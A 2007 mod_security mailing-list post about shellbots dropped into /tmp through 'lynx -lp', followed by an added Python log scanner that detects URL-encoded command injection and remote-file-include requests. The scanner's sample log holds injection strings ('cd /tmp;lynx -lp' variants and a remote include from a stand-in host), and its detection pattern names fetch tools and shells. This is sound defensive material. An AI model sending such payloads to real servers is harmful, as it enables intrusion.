[Modsecurity] Shellbot installation via lynx -lp

admin at efastservers.com
Thu Sep 13 13:43:23 EDT 2007


There seems to be a new way of installing shellbots into the /tmp directory
on the server, and I'm not positive on how it's being done.

I've noticed this on 2 of my clients' servers in the past few weeks.

What's strange about it is that mod_security has not caught it. Now, we install a
fairly complicated version of the rules on our clients' servers. It includes
lynx, at least 3 variations, and /usr/bin/lynx is chmod 750, yet it seems
that this is how it's being installed at the moment.

I can't understand how lynx -lp is being executed. If it's chmod 750, nobody
from the internet can execute the command. Why do I think it's lynx -lp?
Because I killed a pid that was executing lynx -lp as the user nobody.

They did not get far. The firewall denies all outbound connections, and these
bots usually try to make a connection outbound on port 6667. Even so, I'm
frustrated as hell trying to find out how it's being done. I searched all
the user logs using egrep and could not find an occurrence of lynx -lp, but
it was definitely there, and the firewall did tell me that it was a
suspicious process running.

I'm also surprised that our mod_sec rules, which are about 57k, did not catch
it. If it was used as a cmd= or whatever, both cmd and lynx do exist in the
rules, and the fact that lynx, wget, scp etc. are all chmod 750 is a mystery
to me.

Unless it's being installed some other way than via a malicious URL, I
have no idea how it's getting dumped to /tmp.

Anyone?
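One check worth running before concluding the command string is absent from the logs: a literal `egrep 'lynx -lp'` over an access log misses the same payload when it arrives URL-encoded (`lynx%20-lp`, `lynx+-lp`, or double-encoded `lynx%2520-lp`), which is how an injected command would normally appear in a GET query string. The script below is an added example written for this page, not code from the original poster or from the mod_security project. It assumes an Apache "combined" log format, decodes every query parameter until it stops changing, and flags values that invoke a fetch tool or interpreter (the tool list is an assumption) or that are themselves a URL (the remote-file-include pattern). The log lines embedded in it are constructed for the demonstration, not real traffic.

```python
"""Hunt an Apache access log for command-injection and remote-include style
requests that a literal `egrep 'lynx -lp'` would miss because the payload
arrives URL-encoded (lynx%20-lp, lynx+-lp, or double-encoded lynx%2520-lp).
Added example; the log lines below are constructed, not from any real server."""
import re
from urllib.parse import unquote_plus

# Apache "combined" log format (assumption: the server logs in this format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# A fetch tool or interpreter at the start of a value or right after a shell
# separator, followed by at least one argument: "lynx -lp", "cd /tmp;wget http..."
# The tool list is an assumption; extend it to match your own rule set.
TOOL_RE = re.compile(r'(?:^|[;|&`(\s])(lynx|wget|curl|fetch|perl|sh|bash)\s+\S')
# A parameter value that is itself a URL: classic remote-file-include vector.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly (+ and %XX) until stable, so double-encoded
    payloads such as %2520 collapse to a space as the shell would see them."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line):
    """Return a list of findings for one log line (empty if nothing suspicious)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = m.group('request').split()
    target = parts[1] if len(parts) >= 2 else m.group('request')
    _, _, query = target.partition('?')
    findings = []
    for pair in filter(None, query.split('&')):
        name, _, raw = pair.partition('=')
        value = decode_fully(raw)
        if TOOL_RE.search(value):
            reason = 'tool_exec'
        elif REMOTE_URL_RE.match(value):
            reason = 'remote_url'
        else:
            continue
        findings.append({'ip': m.group('ip'), 'time': m.group('time'),
                         'param': name, 'decoded': value, 'reason': reason})
    return findings


def scan_log(lines):
    """Run scan_line over every line and flatten the findings."""
    return [f for line in lines for f in scan_line(line)]


# Constructed sample log (not real traffic): one RFI attempt, three encodings
# of the same "lynx -lp" injection, and two benign requests.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Sep/2007:10:02:11 -0400] "GET /index.php?page=http://example.invalid/x.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [13/Sep/2007:10:05:42 -0400] "GET /cgi-bin/foo.cgi?cmd=cd%20/tmp;lynx%20-lp HTTP/1.1" 200 88 "-" "libwww-perl/5.805"',
    '198.51.100.9 - - [13/Sep/2007:10:05:50 -0400] "GET /cgi-bin/foo.cgi?cmd=lynx+-lp HTTP/1.1" 200 88 "-" "libwww-perl/5.805"',
    '198.51.100.9 - - [13/Sep/2007:10:06:03 -0400] "GET /cgi-bin/foo.cgi?cmd=lynx%2520-lp HTTP/1.1" 200 88 "-" "libwww-perl/5.805"',
    '192.0.2.44 - - [13/Sep/2007:10:07:15 -0400] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [13/Sep/2007:10:07:20 -0400] "GET /docs/wget.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} {hit['reason']:10} {hit['param']}={hit['decoded']!r}")
```

Run it against a real log with `scan_log(open('/var/log/httpd/access_log'))`. Two caveats apply to any log search of this kind: the default access log records only the request line, so a command delivered in a POST body never appears in it, and a request that reached a vulnerable script through a second server (a proxy, or an include fetched by the script itself) shows up only in that script's own outbound traffic, not in the inbound log.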
